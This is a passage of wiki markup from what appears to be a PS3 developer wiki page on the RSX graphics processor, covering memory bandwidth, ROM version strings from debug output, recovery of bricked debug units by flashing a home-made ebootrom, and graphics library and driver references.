{|class=&quot;wikitable&quot;<br /> |-<br /> ! Processor !! 256MB XDR !! 256MB GDDR3<br /> |-<br /> | Cell Read || 16.8GB/s || 16MB/s (15.6MB/s @ 650MHz)<br /> |-<br /> | Cell Write || 24.9GB/s || 4GB/s<br /> |-<br /> | RSX Read || 15.5GB/s || 22.4GB/s (20.8GB/s @ 650MHz)<br /> |-<br /> | RSX Write || 10.6GB/s || 22.4GB/s (20.8GB/s @ 650MHz)<br /> |-<br /> |}<br /> <br /> Because of the VERY slow Cell Read speed from the 256MB GDDR3 memory, it is more efficient for the Cell to work in XDR and then have the RSX pull data from XDR and write to GDDR3 for output to the HDMI display. This is why extra texture lookup instructions were included in the RSX to allow loading data from XDR memory (as opposed to the local GDDR3 memory).<br /> <br /> == ROM Versions ==<br /> <br /> These are the listed RSX ROM (aka Vbios) versions info we have collected from lv1 debug ouput<br /> <br /> DEH/DECR-1000:<br /> <br /> &lt;pre&gt;<br /> [INFO]: BE:3.1, SB:DX3.1<br /> rsx: a01 420/600 vpe:ff shd:3f [AE0000915:0:1:16:b:f:1:1:1]<br /> <br /> [INFO]: BE:3.1, SB:DX3.1<br /> rsx: a02 420/600 vpe:ff shd:3f [F9A458700:0:2:3:b:f:3:1:1][0:0:0:0:0:3]<br /> <br /> [INFO]: BE:3.1, SB:DX3.2<br /> rsx: b01 500/650 vpe:ff shd:5f [AE0000993:0:1:13:c:a:1:4:2][16:3:0:0:1:3:0]<br /> <br /> [INFO]: BE:3.1, SB:DX3.2<br /> rsx: b01 500/600 vpe:ff shd:77 [FCA684200:0:2:2:f:7:3:5:1][0:0:0:0:0]<br /> <br /> [INFO]: BE:3.1, SB:DX3.2<br /> rsx: b01 500/650 vpe:ff shd:5f [AE0000993:0:1:13:c:a:1:4:2][16:3:0:0:1:3:0]<br /> <br /> [INFO]: BE:3.1, SB:DX3.2<br /> rsx: b01 500/650 vpe:ff shd:7d [G1A778601:1:2:15:7:10:3:7:2][16:3:0:0:1:3:0]<br /> <br /> [INFO]: BE:3.1, SB:DX3.2<br /> rsx: b03 500/650 vpe:ff shd:7b [GAB886100:1:2:17:f:5:3:f:2][16:3:0:0:1:3:1][0:0:0]<br /> <br /> [INFO]: BE:3.1, SB:DX3.2<br /> rsx: b07 500/650 vpe:ff shd:3f [J3E106900:1:2:c:b:6:3:12:1][16:3:2:0:1:3:1][0:0:0]<br /> <br /> [INFO]: BE:3.1, SB:DX3.2<br /> rsx: b07 500/650 vpe:ff shd:3f [J3E107200:1:2:a:6:3:3:12:1][16:3:2:0:1:3:1][0:0:0]<br /> <br /> [INFO]: BE:3.1, SB:DX3.2<br /> rsx: b07 500/650 vpe:ff shd:3f [J3E078500:1:2:11:c:f:3:12:1][16:3:2:0:1:3:1][0:0:0]<br /> <br /> RETAIL: <br /> [INFO]: BE:3.1, SB:DX3.1<br /> rsx: b08 1f4/28a vpe:ff shd:3f [AP0004687:1:1:14:13:a:2:f:1][16:3:1:1:1:3:1][0:0:0]<br /> &lt;/pre&gt;<br /> <br /> Speculatively it is likely that the very first numbers are the actual rom version (a01, b01, b03, b07, b08...) despite Sony's documentation claiming otherwise, DECR-1000 units with rom version b07 and above (and perhaps some others that have not been encounter) are not capable of running any firmware lower than 1.60 (from sdk 160.008) this is because the rom version is unknown/unsupported in older lv1 which will fail to initialize the RSX hardware and will cause lv1 to output a &quot;rsx rom abort!&quot; messaage, this will in turn create an exception early in lv2 boot process as it tries to use the RSX and creates a hard brick several RSX related errors such as &quot;lv2(2): # __rsxaudio_intr_create_thread 983 ffffffff&quot; or &quot;graphics error 512 : 00012625 c221bbb0&quot; ; &quot;lv2(2): page fault handler (DSI): invalid access address 0x795d00e8!&quot;. <br /> <br /> There is nothing in the documentation warning you about this and there is nothing preventing (or a legitimate developer) to install an unsupported firmware as the vsh allows updating to 1.00 or higher and the min praxis for those units is actually lower than 1.00.<br /> Should this issue occur to you, other than sending the unit back to Sony for servicing, the only way to fix this is to flash an ebootrom (as lv0 still runs fine and is in charge of handling flashing the system memory through lcnslsrv) the problem with that is that sony never released/issue an ebootrom for a firmware higher than 1.00.002 , so officially one would have no choice but to return the unit, that said, considering the ebootrom format is not rocket science and is actually documented (it's a very slight variation of the coreos package format, there are no specific checks whatsoever preventing you from crafting your own, it is not hashed, nor encrypted), you could (as we did) convert the PUP file of a higher firmware and flash it into the unit to get a full recovery.<br /> <br /> == RSX Libraries ==<br /> The RSX is dedicated to 3D graphics, and developers are able to use different API libraries to access its features. The easiest way is to use high level PSGL, which is basicially OpenGL|ES with programmable pipeline added in - but hardly anyone uses PSGL these days, preferring to use the native GPU command buffer generation library, libgcm.<br /> At a lower level developers can use LibGCM, which is an API that talks to the RSX at a lower level. PSGL is actually implemented on top of LibGCM. For the advanced programmer, you can program the RSX by sending commands to it directly using C or assembly. This can be done by setting up commands (via FIFO Context) and DMA Objects and issuing them to the RSX via DMA calls.<br /> <br /> == Drivers (WiP/reference) ==<br /> <br /> * [http://mandos.homelinux.org/~glaurung/git/ps3rsx.git/ ps3rsx.git]<br /> * [http://mandos.homelinux.org/~glaurung/git/xf86-video-ps3.git/ xf86-video-ps3.git]<br /> * [http://nouveau.freedesktop.org/wiki/ nouveau wiki]<br /> * [http://psp.jim.sh/svn/listing.php?repname=ps3ware&amp;path=%2Ftrunk%2Flibps3rsx%2Fsrc%2Ffifo%2F&amp;#a408e4e3f64f03a0a91e8200a1a873401 libps3rsx]<br /> * [http://www.mesa3d.org/cell.html Mesa/Gallium Cell Driver]<br /> * git://nouveau.git.sourceforge.net/gitroot/nouveau/envytools (docs are in hwdocs, commands are in the xml's in rnndb)<br /> <br /> [[PSL1GHT]]<br /> * http://psl1ght.net/wiki/Homebrew_status<br /> * https://code.google.com/p/rsxgl/ / https://github.com/gzorin/RSXGL<br /> * https://github.com/kakaroto/e17<br /> <br /> = Other References =<br /> *&lt;strike&gt;http://7track.org/~durandal/ps3dox/&lt;/strike&gt; http://lol.notsoldierx.com/~durandal/ps3dox/ // http://173.220.0.157/~durandal/ps3dox/<br /> *http://wiki.ps2dev.org/ps3:rsx<br /> *[http://download.nvidia.com/developer/cg/Cg_1.4/1.4.1/Cg-1.4.1_UsersManual.pdf Cg Toolkit User's Manual: A Developer's Guide to Programmable Graphics, Release 1.4.1]<br /> *The Cg Tutorial (ISBN: 0321194969, Addison-Wesley, 2003)<br /> * [http://www.multiupload.com/D1XJHRH6Z9 cg-shader-tutorial.pdf (535.94 KB)] + [https://github.com/Themaister/Emulator-Shader-Pack Git: Emulator-Shader-Pack ]<br /> * http://pastie.org/private/qbpm88aml03vq8jexxvnsa PS3 RSX Glevand<br /> <br /> * Good overview of quotes of how SPU's are used together with RSX for retail games:<br /> **[http://www.neogaf.com/forum/showthread.php?p=7598043 PS3 games list &amp; SPE usages part 1]<br /> **[http://www.neogaf.com/forum/showpost.php?p=7598610&amp;postcount=32 PS3 games list &amp; SPE usages part 2]<br /> <br /> <br /> <br /> {{Motherboard Components}}&lt;noinclude&gt;[[Category:Main]]&lt;/noinclude&gt;</div> Mathieulh